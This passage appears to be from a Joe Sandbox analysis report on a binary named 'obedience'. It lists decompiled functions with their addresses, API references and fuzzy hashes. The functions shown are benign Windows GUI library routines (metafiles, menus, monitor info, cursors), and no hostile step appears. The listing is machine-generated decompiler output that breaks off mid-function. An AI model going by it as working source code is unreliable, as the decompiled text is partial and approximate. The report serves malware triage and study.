      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
      • String ID:
      • API String ID: 3024527889-0
      • Opcode ID: 117c01754b1dacfc69b53c6c22e6783539ed2adab1de2d06d1d681dba916e921
      • Instruction ID: be4374f3b2aacd31ed3cb822cd117ae7d5c676763d0dc55d632e4d107d918ed2
      • Opcode Fuzzy Hash: 117c01754b1dacfc69b53c6c22e6783539ed2adab1de2d06d1d681dba916e921
      • Instruction Fuzzy Hash: 29512B74A00205EFEB50EF99C986E9EB7F4AF08304F24456AF500EB351D779AE40DB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004298B8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
      Download Yara Rule
      C-Code - Quality: 70%
      			E004298B8(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00403498( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00427C60( &_v38);
					_v18 = _t43;
					_push(0);
					L00407658();
					_v16 = _t43;
					_push(_t83);
					_push(0x4299f3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E00402ACC(_v12, 0, 0x16);
					_push(_t83);
					_push(0x4299d3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00426E50(_t67);
					}
					E0041C408(_t80, 0x16,  &_v38);
					E0041C408(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4299da);
					return E00402AFC(_v8);
				}
			}






















      0x004298b9
      0x004298bb
      0x004298c0
      0x004298c2
      0x004298c8
      0x004299ff
      0x004298ce
      0x004298d8
      0x004298dd
      0x004298e0
      0x004298e7
      0x004298ee
      0x004298f8
      0x004298f0
      0x004298f0
      0x004298f0
      0x0042990f
      0x00429926
      0x0042992d
      0x00429932
      0x00429936
      0x00429938
      0x0042993d
      0x00429942
      0x00429943
      0x00429948
      0x0042994b
      0x00429961
      0x0042996c
      0x00429971
      0x00429972
      0x00429977
      0x0042997a
      0x00429997
      0x00429999
      0x00429999
      0x004299a8
      0x004299b5
      0x004299bc
      0x004299bf
      0x004299c2
      0x004299d2
      0x004299d2

      APIs
      • MulDiv.KERNEL32(?,?,000009EC), ref: 0042990A
      • MulDiv.KERNEL32(?,?,000009EC), ref: 00429921
      • 73BEAC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00429938
      • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004299F3,?,00000000,?,?,000009EC,?,?,000009EC), ref: 0042995C
      • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004299D3,?,?,00000000,00000000,00000008,?,00000000,004299F3), ref: 0042998F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: BitsFileMeta
      • String ID: `
      • API String ID: 858000408-2679148245
      • Opcode ID: 2a14881c2344e325fdca05f12335808e363eb3b8c2717b9dbcd8998f77520079
      • Instruction ID: 187f2ec53fa7709c87e6992b5ef46663259db01b626e0ac298fe9cfbf8bfdd96
      • Opcode Fuzzy Hash: 2a14881c2344e325fdca05f12335808e363eb3b8c2717b9dbcd8998f77520079
      • Instruction Fuzzy Hash: BA318575B14208ABDB00DFD5D882AEEB7B8EF09714F50405AF904FB381D678AE40D769
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00452C50 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 54%
      			E00452C50(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				void* _t29;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(_t29);
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x490b64 == 0) {
					 *0x490b64 = E0040D444("comctl32.dll", __eax, _t29);
					if( *0x490b64 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x490b68 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E004231B8(_t43, 1, 0);
				_push(_t45);
				_push(0x452d4a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x490b68 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00451B70(_t28);
					_push(_t11);
					L0042D084();
					if(_t11 == 0) {
						_t33 =  *0x48f6e4; // 0x423ad8
						E0040CCA8(_t33, 1);
						E004043D0();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00451B70(_t28));
					if( *0x490b68() != 0) {
						_t34 =  *0x48f6e4; // 0x423ad8
						E0040CCA8(_t34, 1);
						E004043D0();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x452d51);
				return E00403BF0(_v8);
			}

















      0x00452c51
      0x00452c53
      0x00452c54
      0x00452c57
      0x00452c59
      0x00452c62
      0x00452c6e
      0x00452c7d
      0x00452c89
      0x00452c8d
      0x00452c9a
      0x00452c9a
      0x00452c8d
      0x00452c7d
      0x00452caf
      0x00452cb4
      0x00452cb5
      0x00452cba
      0x00452cbd
      0x00452cc7
      0x00452d01
      0x00452d06
      0x00452d08
      0x00452d08
      0x00452d0b
      0x00452d0e
      0x00452d13
      0x00452d14
      0x00452d1b
      0x00452d1d
      0x00452d2a
      0x00452d2f
      0x00452d2f
      0x00452cc9
      0x00452cc9
      0x00452cce
      0x00452cd0
      0x00452cd0
      0x00452cd3
      0x00452cd4
      0x00452cdd
      0x00452ce6
      0x00452ce8
      0x00452cf5
      0x00452cfa
      0x00452cfa
      0x00452ce6
      0x00452d36
      0x00452d39
      0x00452d3c
      0x00452d49

      APIs
        • Part of subcall function 0040D444: 739F14E0.VERSION(00000000,?,00000000,0040D51A), ref: 0040D486
        • Part of subcall function 0040D444: 739F14C0.VERSION(00000000,?,00000000,?,00000000,0040D4FD,?,00000000,?,00000000,0040D51A), ref: 0040D4BB
        • Part of subcall function 0040D444: 739F1500.VERSION(?,0040D52C,?,?,00000000,?,00000000,?,00000000,0040D4FD,?,00000000,?,00000000,0040D51A), ref: 0040D4D5
      • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00452C84
      • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00452C95
      • 6F8DCEF0.COMCTL32(00000000,?,00000000,00452D4A), ref: 00452D14
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressF1500HandleModuleProc
      • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
      • API String ID: 3659472037-3125200627
      • Opcode ID: 70998badef0836917bf35ba26e2c9acd9c5180b3a82ebbd7cc9cc4f205320971
      • Instruction ID: a5d84d4efbb52a92d7a536b4030e6093e8669bc67846a6e460128813c7fd1739
      • Opcode Fuzzy Hash: 70998badef0836917bf35ba26e2c9acd9c5180b3a82ebbd7cc9cc4f205320971
      • Instruction Fuzzy Hash: 2C215E31A046009BD714AB75EE55B2E36B99B5671EB50053BFC04D72A3D6BDEC08C62C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00454BCC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00454BCC(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E00454BCC(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00454CFC(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00454CFC(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00454CFC(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E00454A8C(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x4536e0; // 0x45372c
						if(E00403D88( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00454CFC(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









      0x00454bcc
      0x00454bd0
      0x00454bd6
      0x00454be0
      0x00454be2
      0x00000000
      0x00454be2
      0x00454beb
      0x00454bf0
      0x00000000
      0x00454bf2
      0x00454c04
      0x00454c09
      0x00454c0d
      0x00454c12
      0x00454c1b
      0x00454c25
      0x00454c2c
      0x00454c3c
      0x00454c41
      0x00454c41
      0x00454c43
      0x00454c44
      0x00454c4a
      0x00454c50
      0x00454c85
      0x00454c87
      0x00454c8c
      0x00000000
      0x00454c92
      0x00454c55
      0x00454c62
      0x00000000
      0x00454c75
      0x00454c79
      0x00454c80
      0x00000000
      0x00454c80
      0x00454c62
      0x00454c4a
      0x00454c99

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: ,7E
      • API String ID: 0-1487369149
      • Opcode ID: 036d76f8616a9aaa1f8043c2c2e8c8d4c72f579aa24b4f2ac027887370311283
      • Instruction ID: 7472404e42371f2cc0cd4b42d6e909d223251953db317e230c0b66a5cd1c0cee
      • Opcode Fuzzy Hash: 036d76f8616a9aaa1f8043c2c2e8c8d4c72f579aa24b4f2ac027887370311283
      • Instruction Fuzzy Hash: 01119321B0620566DA21AE7A8905B5B36985FC175FF06042BFC029F393CE7CEC8D826C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D93C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
      Download Yara Rule
      C-Code - Quality: 47%
      			E0042D93C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x490931 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407238();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x490918; // 0x42d93c
					 *0x490918 = E0042D52C(5, _t23, "GetMonitorInfoA", _t26, _t29);
					_t24 =  *0x490918(_t27, _t29);
				}
				return _t24;
			}













      0x0042d945
      0x0042d948
      0x0042d952
      0x0042d977
      0x0042d97f
      0x0042d99f
      0x0042d9a4
      0x0042d9af
      0x0042d9ba
      0x0042d9c4
      0x0042d9c5
      0x0042d9c6
      0x0042d9c7
      0x0042d9c8
      0x0042d9c9
      0x0042d9d3
      0x0042d9d5
      0x0042d9dd
      0x0042d9de
      0x0042d9de
      0x0042d9e3
      0x0042d9e3
      0x0042d954
      0x0042d959
      0x0042d966
      0x0042d973
      0x0042d973
      0x0042d9ed

      APIs
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042D994
      • GetSystemMetrics.USER32 ref: 0042D9A9
      • GetSystemMetrics.USER32 ref: 0042D9B4
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042D9DE
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$Metrics$AddressInfoParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfoA
      • API String ID: 2545840971-1370492664
      • Opcode ID: 29a3c3dcd37244793022be55274b4c5bacfbbf78f9a2e6dba6a3527bf5f5976b
      • Instruction ID: c4531b7892aace24af7ecb9b7627fcd333702b64d3c0460514fd221cf2fb85df
      • Opcode Fuzzy Hash: 29a3c3dcd37244793022be55274b4c5bacfbbf78f9a2e6dba6a3527bf5f5976b
      • Instruction Fuzzy Hash: 691103F2B013249FE7608F60AC45BA7B7E8EB06310F40053FF84597251D3B4A980CBA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042DA10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
      Download Yara Rule
      C-Code - Quality: 47%
      			E0042DA10(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x490932 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407238();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49091c; // 0x42da10
					 *0x49091c = E0042D52C(6, _t23, "GetMonitorInfoW", _t26, _t29);
					_t24 =  *0x49091c(_t27, _t29);
				}
				return _t24;
			}













      0x0042da19
      0x0042da1c
      0x0042da26
      0x0042da4b
      0x0042da53
      0x0042da73
      0x0042da78
      0x0042da83
      0x0042da8e
      0x0042da98
      0x0042da99
      0x0042da9a
      0x0042da9b
      0x0042da9c
      0x0042da9d
      0x0042daa7
      0x0042daa9
      0x0042dab1
      0x0042dab2
      0x0042dab2
      0x0042dab7
      0x0042dab7
      0x0042da28
      0x0042da2d
      0x0042da3a
      0x0042da47
      0x0042da47
      0x0042dac1

      APIs
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042DA68
      • GetSystemMetrics.USER32 ref: 0042DA7D
      • GetSystemMetrics.USER32 ref: 0042DA88
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042DAB2
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$Metrics$AddressInfoParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfoW
      • API String ID: 2545840971-2774842281
      • Opcode ID: 2d0478f93acefdd48fe366142f8ac2afbb39f6b184ed0ea24dd71a4a287b9d6a
      • Instruction ID: 828a15328a13e0b06e063ffd0ea0ad04c27ff685f243d406d5660353592df8f2
      • Opcode Fuzzy Hash: 2d0478f93acefdd48fe366142f8ac2afbb39f6b184ed0ea24dd71a4a287b9d6a
      • Instruction Fuzzy Hash: EF11E1B1B053249FE3208F61AC84FA7B7A8EF25310F40453BEC4597251D2B4A8018BA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00429F3C Relevance: 10.6, APIs: 7, Instructions: 66COMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E00429F3C(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E00427698(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00407658();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00407280();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x429feb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x429ff2);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L004078C0();
						return _t31;
					}
				}
			}

















      0x00429f3c
      0x00429f3d
      0x00429f3f
      0x00429f47
      0x00429f4a
      0x00429f4e
      0x00429ff2
      0x00429ff7
      0x00429f5f
      0x00429f6d
      0x00429f72
      0x00429f76
      0x00000000
      0x00429f78
      0x00429f78
      0x00429f7a
      0x00429f7f
      0x00429f82
      0x00429f85
      0x00429f86
      0x00429f8b
      0x00429f98
      0x00429f9d
      0x00429f9e
      0x00429fa3
      0x00429fa6
      0x00429fb7
      0x00429fbe
      0x00429fc1
      0x00429fc4
      0x00429fd1
      0x00429fda
      0x00429fdf
      0x00429fe2
      0x00429fe3
      0x00429fe5
      0x00429fea
      0x00429fea
      0x00429f76

      APIs
        • Part of subcall function 00427698: GetObjectA.GDI32(?,00000004), ref: 004276AF
        • Part of subcall function 00427698: 73BEAEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00429F72), ref: 004276D2
      • 73BEAC50.USER32(00000000), ref: 00429F7A
      • 73BEA590.GDI32(?,00000000), ref: 00429F86
      • SelectObject.GDI32(?), ref: 00429F93
      • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00429FEB,?,?,?,?,00000000), ref: 00429FB7
      • SelectObject.GDI32(?,?), ref: 00429FD1
      • DeleteDC.GDI32(?), ref: 00429FDA
      • 73BEB380.USER32(00000000,?,?,?,?,00429FF2,?,00000000,00429FEB,?,?,?,?,00000000), ref: 00429FE5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$Select$A590B380ColorDeleteTable
      • String ID:
      • API String ID: 980243606-0
      • Opcode ID: ad183c3c4a2d4bb77d4b85db5fdfec1cb44b56cf705b8352cfdfa95108daa70f
      • Instruction ID: 96f81490edaf8d694098af7e0e1b67720fe3675b80c09903467de2b1af394022
      • Opcode Fuzzy Hash: ad183c3c4a2d4bb77d4b85db5fdfec1cb44b56cf705b8352cfdfa95108daa70f
      • Instruction Fuzzy Hash: 70116671E042296FDB50EFE9DC91EAEB7BCEB08314F8144BAF504E7281D6789D4087A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004625B4 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E004625B4(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				_t1 = _t19 + 0x44; // 0x0
				if(__edx ==  *_t1) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00462578(_t19, _t21, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00407A10(SendMessageA(_t27, 0x84, 0, E00407A9C(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












      0x004625b4
      0x004625b4
      0x004625b8
      0x004625bb
      0x004625bd
      0x004625bf
      0x004625c3
      0x00462638
      0x00462638
      0x004625c5
      0x004625c5
